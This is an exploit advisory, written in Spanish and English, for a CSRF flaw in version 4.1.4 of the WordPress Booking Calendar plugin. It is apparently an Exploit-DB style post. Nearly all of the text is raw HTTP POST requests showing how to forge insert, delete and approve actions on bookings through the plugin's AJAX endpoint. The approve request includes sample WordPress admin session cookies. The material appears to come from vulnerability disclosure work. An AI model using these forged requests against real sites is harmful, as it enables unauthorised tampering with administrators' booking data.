###########################################################################################
# Exploit Title: CSRF Plugin Booking Calendar 4.1.4 WordPress
# Date: 04 de Agosto del 2013
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage: http://wpbookingcalendar.com/
# Tested on: Win8 & Linux Mint
# Affected Version : 4.1.4
#
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
# Greetz: all team WebSecuritydev.
###########################################################################################
CSRF VIA POST.
Añadir nuevo.
http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php
POST:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101
Firefox/22.0 AlexaToolbar/alxf-2.18
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer:
http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking-reservation
Content-Length: 311
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------------------------------------
ajax_action=INSERT_INTO_TABLE&bktype=1&dates=19.07.2013&form=text%5Ename1%5Etest~text%5Esecondname1%5Etest~email%5Eemail1%5Edylan.irzi%
40gmail.com
~text%5Ephone1%5Etest~textarea%5Edetails1%5Etest&captcha_chalange=&captcha_user_input=&is_send_emeils=1&my_booking_hash=&booking_form_type=&wpdev_active_locale=es_ES
---------------------------------------------------------
---------------------------------------------------------
Delete:
Url: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php
Post:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101
Firefox/22.0 AlexaToolbar/alxf-2.18
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer:
http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=4&view_mode=vm_listing&tab=actions
Content-Length: 104
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
---------------------------
ajax_action=DELETE_APPROVE&booking_id=4&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES
---------------------------------------------------------
---------------------------------------------------------
<< Aprobar Evento >>
URL: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php
POST:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101
Firefox/22.0 AlexaToolbar/alxf-2.18
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer:
http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=6&view_mode=vm_listing&tab=actions
Content-Length: 128
Cookie:
wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7C9f7f8aa8b2ea97a3464e6053c3c9f271;
wp-settings-time-1=1373853874; wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7Cdd2c6fcb13e1f80327b123e484bd677b;
PHPSESSID=ica6bf0tjnajr0r2rcc1se1fl0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
---------------------------------------------------------
ajax_action=UPDATE_APPROVE&booking_id=6&is_approve_or_pending=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES
---------------------------------------------------------
---------------------------------------------------------
--
*By Dylan Irzi
@Dylan_Irzi11
Pentest de Seguridad.
WhiteHat.
*